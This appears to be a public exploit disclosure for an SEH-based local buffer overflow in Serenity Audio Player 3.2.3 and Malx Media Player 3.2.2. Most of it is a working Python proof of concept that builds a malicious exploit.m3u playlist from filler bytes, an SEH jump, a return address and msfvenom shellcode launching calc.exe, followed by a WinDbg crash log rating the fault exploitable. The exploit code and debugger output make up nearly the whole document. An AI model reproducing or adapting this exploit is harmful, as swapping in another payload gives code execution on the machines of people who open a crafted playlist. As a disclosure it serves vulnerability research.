Serenity is a playlist based audio player for Windows. It features a clean and simple interface with minimal overhead.Formats supported are limited only by CODECs and drivers installed on the machine
SEH Local buffer overflow in Serenity Audio Player 3.2.3 (earlier known as Malx Media Player)
Discovered by :Arjun Basnet from Cyber security works pvt. ltd
Affected Version:
Serenity Audio Player 3.2.3
Malx media player 3.2.2
Lower version also may be affected(Not Checked)
software link: http://malsmith.kyabram.biz/serenity/
The vulnerability was tested on:
Windows 7 and Windows XP SP2 also could work on other version of Windows( not checked)
POC video link can be found below link:
http://youtu.be/ZMC-URZagMg
POC exploit code can be found below:
-------------------------------------------------------------------------------------------------------------------------
import os
# header
buffer = "M3U"
buffer += "#EXTM3"
buffer += "A" * 1011
# JMP 6 bytes
buffer +="\xEB\x06\x90\x90"
buffer += "\xE3\x4A\x40\x00"
buffer += "\x90" * 30
# msfvenom -p windows/exec EXITFUNC=seh CMD=calc.exe -f c -a x86 -b "\x0a\x1a"
#Payload size: 220 bytes
#BadCharacters: \x0a\x1a
buffer += ("\xb8\xc2\x04\xed\x11\xd9\xc5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x31\x31\x43\x13\x03\x43\x13\x83\xc3\xc6\xe6\x18\xed\x2e\x64"
"\xe2\x0e\xae\x09\x6a\xeb\x9f\x09\x08\x7f\x8f\xb9\x5a\x2d\x23"
"\x31\x0e\xc6\xb0\x37\x87\xe9\x71\xfd\xf1\xc4\x82\xae\xc2\x47"
"\x00\xad\x16\xa8\x39\x7e\x6b\xa9\x7e\x63\x86\xfb\xd7\xef\x35"
"\xec\x5c\xa5\x85\x87\x2e\x2b\x8e\x74\xe6\x4a\xbf\x2a\x7d\x15"
"\x1f\xcc\x52\x2d\x16\xd6\xb7\x08\xe0\x6d\x03\xe6\xf3\xa7\x5a"
"\x07\x5f\x86\x53\xfa\xa1\xce\x53\xe5\xd7\x26\xa0\x98\xef\xfc"
"\xdb\x46\x65\xe7\x7b\x0c\xdd\xc3\x7a\xc1\xb8\x80\x70\xae\xcf"
"\xcf\x94\x31\x03\x64\xa0\xba\xa2\xab\x21\xf8\x80\x6f\x6a\x5a"
"\xa8\x36\xd6\x0d\xd5\x29\xb9\xf2\x73\x21\x57\xe6\x09\x68\x3d"
"\xf9\x9c\x16\x73\xf9\x9e\x18\x23\x92\xaf\x93\xac\xe5\x2f\x76"
"\x89\x14\xc1\x4b\x07\x80\x78\x3e\x6a\xcc\x7a\x94\xa8\xe9\xf8"
"\x1d\x50\x0e\xe0\x57\x55\x4a\xa6\x84\x27\xc3\x43\xab\x94\xe4"
"\x41\xc8\x7b\x77\x09\x21\x1e\xff\xa8\x3d")
file = "exploit.m3u"
f = open(file,"w")
f.write(buffer)
f.close()
----------------------------------------------------------------------------------------------------------------------------------
Stack Trace:
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Symbol search path is: SRV*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00400000 0040a000 image00400000
ModLoad: 7c900000 7c9af000 ntdll.dll
|.
. 0 id: 1418 create name: image00400000
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\comdlg32.dll
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll
ModLoad: 773d0000 774d3000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\COMCTL32.dll
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll
ModLoad: 10000000 100b9000 C:\WINDOWS\system32\rlls.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 74c80000 74cac000 C:\WINDOWS\system32\OLEACC.dll
ModLoad: 76080000 760e5000 C:\WINDOWS\system32\MSVCP60.dll
ModLoad: 774e0000 7761d000 C:\WINDOWS\system32\ole32.dll
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll
ModLoad: 78050000 78120000 C:\WINDOWS\system32\WININET.dll
ModLoad: 01ce0000 01ce9000 C:\WINDOWS\system32\Normaliz.dll
ModLoad: 78000000 78045000 C:\WINDOWS\system32\iertutil.dll
ModLoad: 76bf0000 76bfb000 C:\WINDOWS\system32\PSAPI.DLL
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll
(1418.1124): C++ EH exception - code e06d7363 (first chance)
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime
ModLoad: 767f0000 76817000 C:\WINDOWS\system32\Schannel.dll
ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll
ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll
ModLoad: 5b860000 5b8b5000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\USERENV.dll
ModLoad: 029a0000 029f8000 C:\WINDOWS\system32\LavasoftTcpService.dll
ModLoad: 71a50000 71a8f000 C:\WINDOWS\system32\MSWSOCK.dll
ModLoad: 76d60000 76d79000 C:\WINDOWS\system32\IPHLPAPI.DLL
(1418.173c): Unknown exception - code c0000096 (first chance)
(1418.173c): Unknown exception - code c0000096 (!!! second chance !!!)
r
eax=00000000 ebx=00000000 ecx=77c40ad6 edx=01ab0fe8 esi=00401270 edi=0012fbb7
eip=00400055 esp=0012fb90 ebp=0012fe18 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x55:
00400055 6f outs dx,dword ptr [esi] ds:0023:00401270=0824448b
rF
fpcw=027F: rn 53 puozdi fpsw=4000: top=0 cc=1000 -------- fptw=FFFF
fopcode=0000 fpip=001b:5ad72985 fpdp=0023:0012fb30
st0=-1.253621103784834226700e-1829 st1= 0.000000003250463689420e+1720
st2= 0.000000923709286317790e-4933 st3= 5.030055843417188097910e-4932
st4=-2.532331139691264054760e+3433 st5= 1.000000000000000000000e+0000
st6= 1.000000000000000000000e+0000 st7= 1.000000000000000000000e+0000
image00400000+0x55:
00400055 6f outs dx,dword ptr [esi] ds:0023:00401270=0824448b
rX
xmm0=0 1.8357e-043 -0.0146141 -1.02234
xmm1=-0.0146141 -1.52194e-005 -1.02234 -1.52193e-005
xmm2=1.4013e-045 -0.0147865 -1.522e-005 -1.00728
xmm3=1.74424e-039 -1.#QNAN 8.26766e-044 -1.52198e-005
xmm4=6.43282e+037 8.26766e-044 1.74228e-039 0
xmm5=4.90454e-044 1.74227e-039 8.15556e-043 3.78351e-044
xmm6=-1.52193e-005 3.02814e+016 0 1.74084e-039
xmm7=1.68436e-042 7.00649e-044 1.63952e-042 2.00015
image00400000+0x55:
00400055 6f outs dx,dword ptr [esi] ds:0023:00401270=0824448b
kb
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fe18 7e418816 00401270 006d01f4 00000601 image00400000+0x55
0012fe80 7e4189cd 00000000 00401270 006d01f4 USER32!UserCallWinProcCheckWow+0x150
0012fee0 7e4196c7 0012ff0c 00000001 7e42fac4 USER32!DispatchMessageWorker+0x306
0012fef0 00401244 0012ff0c 0012ffc0 00000000 USER32!DispatchMessageA+0xf
0012ff24 00404ff6 00400000 00000000 0015eff3 image00400000+0x1244
0012ffc0 7c817067 00000000 00000000 7ffd9000 image00400000+0x4ff6
0012fff0 00000000 00404ec2 00000000 78746341 kernel32!BaseProcessStart+0x23
.load C:\peach\bin\msec.dll
!exploitable -m
IDENTITY:HostMachine\HostUser
PROCESSOR:X86
CLASS:USER
QUALIFIER:USER_PROCESS
EVENT:DEBUG_EVENT_EXCEPTION
EXCEPTION_FAULTING_ADDRESS:0x400055
EXCEPTION_CODE:0xC0000096
EXCEPTION_LEVEL:SECOND_CHANCE
EXCEPTION_TYPE:STATUS_PRIVILEGED_INSTRUCTION
MAJOR_HASH:0x5e212578
MINOR_HASH:0x3a4f4f12
STACK_DEPTH:7
STACK_FRAME:image00400000+0x55
STACK_FRAME:USER32!UserCallWinProcCheckWow+0x150
STACK_FRAME:USER32!DispatchMessageWorker+0x306
STACK_FRAME:USER32!DispatchMessageA+0xf
STACK_FRAME:image00400000+0x1244
STACK_FRAME:image00400000+0x4ff6
STACK_FRAME:kernel32!BaseProcessStart+0x23
INSTRUCTION_ADDRESS:0x0000000000400055
INVOKING_STACK_FRAME:0
DESCRIPTION:Privileged Instruction Violation
SHORT_DESCRIPTION:PrivilegedInstruction
CLASSIFICATION:EXPLOITABLE
BUG_TITLE:Exploitable - Privileged Instruction Violation starting at image00400000+0x0000000000000055 (Hash=0x5e212578.0x3a4f4f12)
EXPLANATION:A privileged instruction exception indicates that the attacker controls execution flow.!msec.exploitable -m
The call to LoadLibrary(msec) failed, Win32 error 0n127
"The specified procedure could not be found."
Please check your debugger configuration and/or network access.